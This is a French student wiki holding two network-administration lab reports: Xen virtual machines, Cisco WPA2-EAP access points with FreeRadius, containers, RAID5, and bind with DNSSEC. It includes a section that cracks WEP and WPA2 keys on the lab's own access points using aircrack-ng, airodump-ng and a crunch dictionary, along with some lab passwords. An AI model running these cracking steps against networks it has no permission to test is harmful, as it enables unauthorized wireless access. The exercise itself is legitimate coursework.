Wiki d'activités IMA - Contributions de l’utilisateur [fr]

TP sysres IMA2a5 2019/2020 G6

2019-11-29T12:57:38Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 14, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813 key < mot_secret > // mot_secret : il faut en choisir un . Par exemple (pour notre groupe) "IMA2a5-4fun". Il faut pas l'oublier cra vous en aurez besoin pour la config de radius

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_VM_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // remplacer groupe6 par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour nous, groupe6="IMA2a5_4fun". [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7 [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

interface Dot11Radio0 // se mettre dans la bonne interface (i.e Dot11Radio0)
ssid SSID_groupe // on remplace "groupe" par le nom du groupe de la promo [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]

14- rendre les SSID visibles :

interface Dot11Radio0
mbssid // Il faut rajouter l'option "mbssid" à l'interface Dot11Radio0
dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun" [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi Voir tableau Borne Wifi]
mbssid guest-mode // mettre les ssid en guest-mode pour qu'il soient visibles.

15- Attribuer une ip à la borne
enable
conf t
int bvi1
ip address 10.60.0.100 255.255.255.0
exit
exit

on peut maintenant pinger le routeur: <code> ping 10.60.0.254 </code>, mais le les VM

16-Il faut donc rajouter le gateway
enable
conf t
ip route 0.0.0.0 0.0.0.0 10.60.0.253
exit

maintenant on peut reussir à pinger les VM: <code> ping 193.48.57.166 </code>

=== Mise en place du serveur FreeRadius ===

Installation de freeradius:

apt-get install freeradius

Dans le fichier <code>/etc/freeradius/3.0/users</code> on ajoute la ligne:

nyx Cleartext-Password := "glopglop"

Dans le fichier <code>/etc/freeradius/3.0/mods-enabled/eap</code> on modifie la ligne:

eap{
default_eap_type = peap
}

Dans le fichier <code>/etc/freeradius/3.0//mods-enabled/mschap</code> on décommente les lignes suivantes et modifie

use_mppe = yes
require_encryption = yes
require_strong = yes

et on ajoute la ligne suivante:

with_ntdomain_hack = yes

Dans le fichier <code> /etc/freeradius/3.0/clients.conf </code> rajouter le borne comme un client qui se connectera sur le server radius:

client access-point { // nom attribué au client
ipaddr = 10.60.0.100 //adresse ip de la borne
secret = secret_IMA2a5-4fun //mot secret saisi lors de la configuration de la borne
}

Une fois toutes les confirations terminées, nous alons:
-arrêter le server Freeradius
service freeradius stop
-puis le relancer en mode debug afin de visualiser les reqûetes et logs
freeradius -X

===Mise en place serveur DHCP===

Une fois la configuration des bornes et de FreeRadius finie, nous devons rajouter un serveur DHCP sur la borne Wi-Fi. Ainsi, les utilisateur pourront avoir une adresse IP attribuée.

sur le terminal de confiration cisco:
ip dhcp pool groupe6 /goupe6 = "IMA2a5-4fun"
network 10.60.7.0
ns-server celui_de_polytech
ip dhcp pool IMA2a5-4fun excluded-address 10.60.7.252 10.60.7.254

Ca n'a pas marché sur la borne. On le fait donc sur le routeur.

== Crackage de la clé WEP ==

Etape 1: Installation de aircrack-ng

Pour installer aircrack-ng il nous faut etablir la connexion internet par Ethernet dans le eeepc
Ensuite :

apt-get install aircrack-ng

Comme le wifi du pc ne fonctionne pas correctement on utilise un module WI-FI Wi-pi pour le visualiser peripherique on utilise la commande

airmon-ng (pour voir le nom du Wi-pi)
airmon-ng start wlx40a5ef0125eg

[[Fichier:Hf img1.png|700px|center]]

Ensuite il renomme le périphérique en wlan0mon

[[Fichier:HF Img2.png|700px|center]]

On peut ensuite ecouté le réseau avec la commande airodump-ng en spécifiant le canal -c et le module wi-fi utilisé

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a cracotte 6 pour nous c'est 04:DA:D2:9C:50:55

[[Fichier:Wep-image1.png|700px|center]]

Ensuite on capture les packets pour avoir assez IV pour cracker la clé wep cela crée un fichier .cap qu'on utilisera par la suite

airodump-ng -w out -c 8 --bssid 04:DA:D2:9C:50:55 wlan0mon

En parrallèle on lance aircrack pour effectuer des tentatives pour obtenir la clé wep

aircrack-ng out-01.cap

Maintenant il faut attendre d'avoir assez donnée pour casser la clé wep
sachant que avec 25 000 IV on a 50% de chance d'obtenir le mdp
et 50 000 on 90% de chance

[[Fichier:Wep-image2.png|700px|center]]

=== Cassage du WPA2 ===

Dans cette partie, on utilisera la méthode du dictionnaire.

Pour le cassage du WPA on a besoin du handshake pour le recuperer on ecoute le réseau avec la commande airodump-ng

airodump-ng -c 8 wlan0mon

On récupere l'adresse correspondante a Kracotte 6 pour nous c'est 04:DA:D2:9C:50:5D

Ensuite on doit récupérer le handshake pour ça on utilise airodump

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5D -w -tplink wlan0mon

[[Fichier:Recup handshake wpa 2.png|700px|center]]

Cela nous crée un .cap avec le handshake

Comme la puissance de calcul et petite sur les eeepc on utilise une zabeth

on crée le dictionnaire avec crunch :

crunch 8 8 0123456789 >> psw.txt

ensuite lance aircrack avec la commande suivante :

aircrack-ng -0 -w dictionnaire.txt tplink-01.cap

[[Fichier:Wpa craked.png|700px|center]]

au bout de 45min on trouve la clé wpa.

<VirtualHost *:80>
ServerName ima2a5-4fun.site
ServerAlias www.ima2a5-4fun.site
DocumentRoot "/var/www/ima2a5-4fun"
<Directory "/var/www/ima2a5-4fun">
Options +FollowSymLinks
AllowOverride all
Require all granted
</Directory>
ErrorLog /var/log/apache2/error.ima2a5-4fun.site.log
CustomLog /var/log/apache2/access.ima2a5-4fun.site.com.log combined
</VirtualHost>

[https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020/cmds _]

TP sysres IMA5sc 2018/2019 G3

2019-11-28T20:01:04Z

Jcabrald : /* Montage du système de fichiers */

=Première séance=

Nous allons au cours de cette première séance mettre en place un réseau de 3 conteneurs ''from scratch'' en exploitant le principe des espaces de noms pour assurer l'isolation. Un des conteneurs agira comme serveur mandataire inverse plus communément appelé ''reverse proxy'' et aura pour rôle de dispatcher les requêtes vers les deux autres conteneurs serveur web suivant le nom de domaine ciblé par l'utilisateur. Ces deux conteneurs ne seront pas accessibles directement depuis le réseau, c'est le reverse proxy qui assura la liaison entre ces deux différents réseaux.

==Création des fichiers disque des conteneurs==

On crée un fichier de 10 Gio = 10 240 * 1 Mio dont tous les octets sont égales à 0.

dd if=/dev/zero of=/home/pifou/containers/container1 bs=1024k count=10240

==Création du système de fichiers==

On associe un système de fichiers de type ext4 à notre fichier.

mkfs.ext4 /home/pifou/containers/container1

==Montage du système de fichiers==

On commence par créer les répertoires qui contiendront les ''rootfs'' (Root File System) montés. Dans un premier temps, on monte le système de fichiers précédemment créé dans /mnt/container1.

mkdir /mnt/container1
mkdir /mnt/container2
mkdir /mnt/container3
mount -t ext4 -o loop /home/pifou/containers/container1 /mnt/container1

==Déploiement de l'arborescence Debian==

Avant tout, on renseigne le proxy de l'école dans la variable d’environnement correspondante afin qu'on puisse télécharger les paquetages sur le miroir devuan extérieur à l'école.

export http_proxy=https://proxy.polytech-lille.fr:3128

Ensuite on utilise l'outil deboostrap dans /mnt/container1 pour créer un système Debian de base.

debootstrap --include=vim,nano,apache2 stable /mnt/container1

Puis on renseigne le fichier fstab de notre container1, il s'agit du fichier qui indique comment les systèmes de fichiers doivent être montés.

echo "proc /proc proc defaults 0 0" >> /mnt/container1/etc/fstab

Enfin, on peut démonter la partition

umount /mnt/container1

Une fois que nous avons déployé tout ce dont nous avons besoin au sein du container1 il ne reste plus qu'à dupliquer ce fichier deux fois, et on aura trois partitions utilisables pour nos conteneurs.

cp /home/pifou/containers/container1 /home/pifou/containers/container2
cp /home/pifou/containers/container1 /home/pifou/containers/container3

Ensuite on peut monter les trois systèmes de fichiers.

mount -t ext4 -o loop /home/pifou/containers/container1 /mnt/container1
mount -t ext4 -o loop /home/pifou/containers/container2 /mnt/container2
mount -t ext4 -o loop /home/pifou/containers/container3 /mnt/container3

==Configuration des interfaces réseau==

Pour l'instant, on a tout ce qu'il faut pour lancer les conteneurs, seulement ils seraient bien inutiles s'ils ne pouvaient aucunement communiquer entre eux ou avec le système hôte. C'est pourquoi on va créer dans le système hôte 4 interfaces virtuelles pour les 3 conteneurs (un conteneur aura deux interfaces virtuelles dont l'une sera dans le bridge donnant accès à internet, il s’agira de notre conteneur qui agira comme serveur mandataire inverse). On va donc créer un commutateur virtuel dans lequel on mettra les trois interfaces virtuelles vif1, vif2 et vif3 de nos trois conteneurs.

===Création du bridge===

ip link add monpetitpont type bridge

===Création des 4 interfaces virtuelles===

ip link add vif1 type veth peer name eth0@vif1
ip link add vif2 type veth peer name eth0@vif2
ip link add vif3 type veth peer name eth0@vif3
ip link add vif4 type veth peer name eth1@vif4

===Connexion des interfaces virtuelles aux commutateurs virtuels===

vif1 vif2 et vif3 sont mises dans monpetitpont, tandis que vif4 est mise dans bridge

ip link set vif1 master monpetitpont
ip link set vif2 master monpetitpont
ip link set vif3 master monpetitpont
ip link set vif4 master bridge

Il ne faut pas omettre d'activer les interfaces, sans quoi la communication serait impossible.

ip link set vif1 up
ip link set vif2 up
ip link set vif3 up
ip link set vif4 up

On pense à ajouter une adresse IP au commutateur virtuel, même si ce n'est pas obligatoire.

ip a add dev monpetitpont 192.168.1.1/24
ip link set monpetitpont down
ip link set monpetitpont up

== Lancement et configuration réseau des 3 conteneurs ==

=== Lancement des conteneurs ===

Pour ce faire, on va utiliser l’utilitaire unshare permettant de lancer des programmes avec des espaces de noms différents de ceux du parent.

unshare -n -u -p -f -m chroot /mnt/container1 /bin/sh -c "mount /proc ; /bin/bash"

On avait créé dans la partie précédente des paires d'interfaces virtuelles connectées entre elles. Les vif ont été reliés à monpetitpont, il faut maintenant connecter les autres parties aux conteneurs pour qu'ils puissent communiquer entre eux bien qu'ils aient des des espaces de noms différents. Tout ceci aura pour effet de faire apparaître une interface nommée eth0 pour chaque conteneur et une interface eth1 pour le dernier conteneur.

ip link set eth0@vif1 netns /proc/<PID_unshare_c1>/ns/net name eth0
ip link set eth0@vif2 netns /proc/<PID_unshare_c2>/ns/net name eth0
ip link set eth0@vif3 netns /proc/<PID_unshare_c3>/ns/net name eth0
ip link set eth1@vif4 netns /proc/<PID_unshare_c3>/ns/net name eth1

Les différents PID sont récupérés simplement grâce à la commande suivante.

ps aux | grep unshare

On est maintenant en mesure d'attribuer des IPs pour nos conteneurs.

ip addr add 192.168.1.2/24 dev eth0
ip addr add 192.168.1.3/24 dev eth0
ip addr add 192.168.1.4/24 dev eth0

A nouveau, il est nécessaire d'activer les interfaces eth0 de nos 3 conteneurs.

ip link set eth0 up

Nous devons mettre une adresse ip à l'interface eth1 du container3 qui se trouve dans le bridge. Pour se faire, il faut trouver une adresse ip dans le réseau 172.26.145.0/24 (on ping pour voir si une adresse est libre)

ip addr add 172.26.145.150/24 dev eth1

Nous sommes maintenant en mesure de ''pinger'' les conteneurs entre-eux mais également les machines de la salle avec le conteneur 3 et son interface eth1 dont l'autre morceau est connecté au bridge de la machine.

=Seconde séance=

==Suite de la première séance==

Nous allons créer des sous-domaines du domaine plil.space mis à notre disposition chez Gandi.

Tout d'abord nous créons une entrée de type "A" avec comme nom "durotduq.plil.space" et qui pointe vers 172.26.145.150. Ensuite, nous ajoutons deux entrées CNAME "durotduq1" et "durotduq2" avec comme valeur "durotduq". Bien qu'au final tous ces sous-domaines dirigent vers 172.26.145.150, le ''reverse proxy'' sera quand même en mesure de distinguer les requêtes entrantes et de les dispatcher vers les services concernés selon le sous-domaine.

'''''10h15 => Serveurs Web unshare OK'''''

Sur le conteneur mandataire inverse, on applique la configuration suivante dans le fichier /etc/apache2/sites-enabled/000-default.conf.

<VirtualHost *:80> 
ServerName durotduq1.plil.space
ServerAdmin webmaster@localhost 
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined 
ProxyPass / http://192.168.1.101/
ProxyPassReverse / http://192.168.1.101/
ProxyRequests Off 
</VirtualHost>

<VirtualHost *:80> 
ServerName durotduq2.plil.space
ServerAdmin webmaster@localhost 
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined 
ProxyPass / http://192.168.1.102/
ProxyPassReverse / http://192.168.1.102/
ProxyRequests Off 
</VirtualHost>

192.168.1.102 et 192.168.1.101 étant les adresses IP des conteneurs 1 et 2 dans monpetitpont. S'agissant d'adresses privées, elles sont donc non accessibles depuis l'extérieur et par conséquent toute connexion se fera par le biais du serveur mandataire inverse.

==Réalisation avec Docker==

Notre architecture de conteneurs ''from scratch'' fonctionne mais elle a l'inconvénient d'être relativement longue à installer et peu pratique. De plus, sans un minimum de scripting, les configurations ne peuvent être pérennisées. Ainsi, nous devions tout refaire à la main à chaque fois.

Dans la pratique, on préférera utiliser Docker comme système de gestion de conteneurs, car il permet d’une manière simple de manipuler et gérer les conteneurs. Il permet également que les configurations soient durables et offre la possibilité de gérer différentes version pour une même image et même de les distribuer.

Nous allons donc réaliser exactement la même architecture mais cette fois-ci à l'aide de Docker. Nous partirons sur la base d'une image Debian.

Lancement d'un conteneur Docker à partir de l'image debian

docker run -i -t debian /bin/bash

Export du proxy

export http_proxy=http://proxy.polytech-lille.fr:3218

Mise à jour de la liste des paquetages en local puis installation des paquetages vim, nano et apache2

apt-get update && apt-get install vim nano apache2

Maintenant, nous pouvons faire un commit des fichiers de ce conteneur, de cette manière, nous aurons une nouvelle image sur laquelle on pourra instancier des conteneurs.

Pour pouvoir réaliser ce commit, il faut connaitre l'identifiant du conteneur :

docker ps
docker commit 7e456 myapache2

A cet instant, nous avons une image myapache2 basée sur Debian avec les paquetages listés précédemment. La présence de cette image se vérifier avec la commande suivante.

docker images

Maintenant que nous sommes en mesure de lancer 3 conteneurs identiques contenant un serveur web Apache 2, nous créons un réseau Docker pour interconnecter les conteneurs. Sans précision de l'option --driver, il s'agit par défaut d'un bridge, ce que nous voulons.

docker network create pontpont

Nous pouvons à présent lancer les 3 conteneurs en spécifiant leur réseau d'attache et sans oublier d'exposer le port 80 du conteneur ''reverse proxy'' en le rendant accessible depuis le port 80 de la machine. Il faudra donc veiller à changer l'entrée DNS de type A avec l'IP de la zabeth (172.26.145.37).

docker run --net pontpont -i -t myapache2 /bin/bash
docker run --net pontpont -i -t myapache2 /bin/bash
docker run --net pontpont -p 80:80 -i -t myapache2 /bin/bash

La suite est très similaire à ce qui a été fait en première partie.

On repère les IPs des conteneurs 1 et 2 pour pouvoir adapter la configuration d'Apache 2 et on change la valeur de l'entrée DNS de type A durotduq.plil.space avec l'IP de la zabeth.

Le résultat final est bien évidemment identique, la solution moins formatricice certes mais plus pratique et utilisée en production.

'''''12h10 => Serveurs Web docker OK'''''

=Partie TP commune=

==Création des machines virtuelles==
Pour réaliser cette partie du TP nous avons besoin d'une machine virtuelle, nous allons la créer sur cordouan à l'aide de l'hyperviseur xen.

Nous créons donc une image qui sera la base de notre machine :

xen-create-image --hostname=pegase --ip=193.48.57.179 --netmask=255.255.255.240 --gateway=193.48.57.160 -size=10Gb --swap=128Mb --lvm=virtual

Une fois que cette image est créée, on édite le fichier de configuration /etc/xen/pegase.cfg afin de lui attribuer une interface réseau virtuelle qui sera dans le bridge IMA5sc.

vif = [ 'mac=00:16:3E:6F:37:08, bridge=IMA5sc' ]

Une fois le fichier de configuration créé, nous pouvons lancer la machine virtuelle à l'aide de la commande suivante et de son option -c permettant d'afficher la console.

xl create -c /etc/xen/pegase.cfg

Le mot de passe root était affiché à l'écran à la fin de la création de la machine virtuelle, mais il est toujours possible d'aller le récupérer dans les logs dans le fichier /var/log/xen-tools/pegase.log

==Ajout de partitions logiques==

Notre machine virtuelle fonctionne et est connectée au réseau. Pour le moment un seul volume de 10Go accueil notre système. Pour les besoins du TP, nous allons sur l'hôte (cordouan) créer deux volumes virtuels, un pour le /home et un autre pour le /var. Nous allons créer ces volumes virtuels dans le groupe de volume "virtual". Nous ajoutons également trois volumes de 1Gb afin de faire un RAID 5 logiciel dans la machine virtuelle.

lvcreate -L10G -n pegase-home virtual
lvcreate -L10G -n pegase-var virtual
lvcreate -L1G -n pegase-part1 virtual
lvcreate -L1G -n pegase-part2 virtual
lvcreate -L1G -n pegase-part3 virtual

Nous ajoutons ensuite ces volumes à notre machine virtuelle en tant que disque physique xvdb1, xvdc1, etc...

root = '/dev/xvda2 ro'
disk = [
'phy:/dev/virtual/pegase-disk,xvda2,w',
'phy:/dev/virtual/pegase-swap,xvda1,w',
'phy:/dev/virtual/Pegase-home,xvdb1,w',
'phy:/dev/virtual/Pegase-var,xvdc1,w',
'phy:/dev/virtual/pegase-part1,xvdd1,w',
'phy:/dev/virtual/pegase-part2,xvde1,w',
'phy:/dev/virtual/pegase-part3,xvdf1,w'
]

Nous pouvons maintenant redémarrer la machine et monter un système de fichier sur nos disques. On peut vérifier qu'ils existent d'ailleurs à l'aide de la commande fdisk -l.

mkfs -t ext4 xvdb1
mkfs -t ext4 xvdc1
mkfs -t ext4 xvdd1
mkfs -t ext4 xvde1
mkfs -t ext4 xvdf1

Nous ajoutons le montage du disque xvdb1 en tant que /home dans /etc/fstab

/dev/xvdb1 /home ext4 defaults 0 2

Pour le /var, il faut faire attention de ne pas perdre les données déjà existante, au risque d'avoir une machine inutilisable. Ainsi, on va venir monter temporairement le disque xvdc1 dans /mnt avant d'y déplacer l'intégralité du /var.

mount /dev/xvdc1 /mnt
mv /var/* /mnt

Une fois ceci fait, nous pouvons le rajouter dans /etc/fstab

/dev/xvdc1 /var ext4 defaults 0 2

Maintenant, intéressons nous au RAID, nous avons utilisé l'utilitaire mdadm afin de réaliser le RAID5 en logiciel. Puis nous avons formaté la partition formée par le raid avant de la monter. Puis nous créons un fichier sur cette partition.

mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd1 /dev/xvde1 /dev/xvdef1
mkfs -t ext4 /dev/md0
mount /dev/md0 /mnt
touch coucou.txt

On ajoute le /dev/md0 au /etc/fstab afin qu'il soit monté au lancement de la machine :

proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdc1 /var ext4 defaults 0 2
/dev/md0 /mnt/raid ext4 defaults 0 2

On vérifie que tous nos disques ont été correctement montés :

lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
xvda1 202:1 0 128M 0 disk [SWAP]
xvda2 202:2 0 10G 0 disk /
xvdb1 202:17 0 10G 0 disk /home
xvdc1 202:33 0 10G 0 disk /var
xvdd1 202:49 0 1G 0 disk
`-md0 9:127 0 2G 0 raid5 /mnt
xvde1 202:65 0 1G 0 disk
`-md0 9:127 0 2G 0 raid5 /mnt
xvdf1 202:81 0 1G 0 disk
`-md0 9:127 0 2G 0 raid5 /mnt

Par défaut, notre raid n'a pas de fichier de configuration, nous devons en créer un. Sans fichier de configuration, le device RAID ne sera pas forcément créé dans /dev/md0 mais dans un md aléatoire, ainsi, notre fstab plantera (car nous n'aurons pas forcément le RAID sur /dev/md0). Donc nous devons avoir un fichier de configuration qui sera persistant et chargé par le noyau durant le boot.

mdadm -Es >> /etc/mdadm.conf

Cette configuration ressemble à

cat /etc/mdadm.conf
ARRAY /dev/md/0 metadata=1.2 UUID=b28705d4:15d1703c:4cf988d8:f0d77f12 name=pegase-ansible2:0

A partir de là, nous avons une configuration persistante du raid. Le RAID 5 sera identifié au boot et monté automatiquement. Nous pouvons maintenant tester notre redondance, simulons une panne sur un des disques de notre RAID, ce qui pourrait arriver dans un cas réel.

mdadm --set-faulty /dev/md0 /dev/xvdf1
mdadm --remove /dev/xvdf1

Nous constatons que notre fichier coucou.txt est toujours présent, malgré la "perte" de l'un des disques. Cependant, il faut tout de même se dire que nous avons fait un raid logiciel sur des partitions logiques, en pratique, si on perd vraiment le disque, nous perdrons quoi qu'il arrive tous les volumes logiques. Ainsi nous faisons ça pour l'aspect éducatif.

==Chiffrement des disques RAID==

Il peut être utile pour diverses raison de chiffrer les disques afin qu'un accès non autorisé par le propriétaire soit proscrit. Pour cela nous allons utiliser l'utilitaire cryptsetup avec le format LUKS afin de chiffrer notre disque en AES-256 avec un mot de passe.

==Installation de bind et apache2==

L'objectif va être d'héberger notre propre serveur DNS grâce au logiciel bind et de vérifier son fonctionnement en hébergeant un site web avec apache2. On commence donc par installer ces deux paquets :

apt-get install apache2 bind9

==Configuration de Bind==

Pour continuer ce TP, nous avons acheté un nom de domaine (pegase.space) sur le registraire Gandi. La configuration de bind se trouve dans le répertoire <code>/etc/bind</code> dans lequel nous avons créé un fichier nommé <code>db.pegase.space</code> représentant notre zone et avec le contenu suivant :

$TTL 604800
@ IN SOA ns.pegase.space. root.pegase.space (
42 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
IN NS ns.pegase.space.
ns IN A 193.48.57.179
www IN A 193.48.57.179
@ IN A 193.48.57.179

Nous avons également modifié le fichier de configuration <code>named.conf.local</code> en ajoutant la ligne allow-transfer à "none".

zone "pegase.space" {
type master;
file "/etc/bind/db.pegase.space";
allow-transfer {"none";};
};

On peut maintenant redémarrer le service bind qui est maintenant opérationnel

service bind9 restart

Nous nous sommes ensuite rendu sur le site de Gandi sur lequel avons ajouté un Glue Record <code>ns.pegase.space</code> pointant vers l'IP de notre VM. Cet enregistrement permet la résolution du nom de notre serveur DNS qui ne peut se résoudre lui même.

On peut ensuite ajouter le serveur maître utilisé pour résoudre les adresses de notre zone pegase.space à savoir <code>ns.pegase.space</code>.

Après un certain temps, le temps que ces informations se propagent, nous étions en mesure d'obtenir l'IP de notre VM en effectuant par exemple un

host pegase.space

==Sécuriser les échanges DNS : DNSSEC==

Dans cette partie, nous allons faire en sorte de certifier à un utilisateur que l'IP qu'il reçoit dans la réponse DNS est bien celle du domaine voulu. Pour ce faire, nous allons configurer bind pour qu'il soit capable d'accepter les échanges suivant le protocole DNSSEC.

On commence naturellement par activer DNSSEC en ajoutant l'option <code>dnssec-enable yes;</code> dans le fichier <code>/etc/bind/named.conf.local</code>.

On génère deux couples de clefs (ZSK et KSK) qui permettront de chiffrer ou déchiffrer les enregistrements.

dnssec-keygen -f KSK -a RSASHA256 -b 2048 -n ZONE pegase.space
dnssec-keygen -a RSASHA256 -b 2048 -n ZONE pegase.space

Nous avons ensuite renommé ces clefs pour plus de lisibilité en <code>pegase-zsk.key</code>, <code>pegase-zsk.private</code>, <code>pegase-ksk.key</code>, <code>pegase-ksk.private</code>

On ajoute ensuite via la directive <code>include</code> nos clefs au fichier de zone <code>db.pegase.space</code>

$include /etc/bind/pegase-ksk.key
$include /etc/bind/pegase-zsk.key

Nous pouvons maintenant signer la zone :

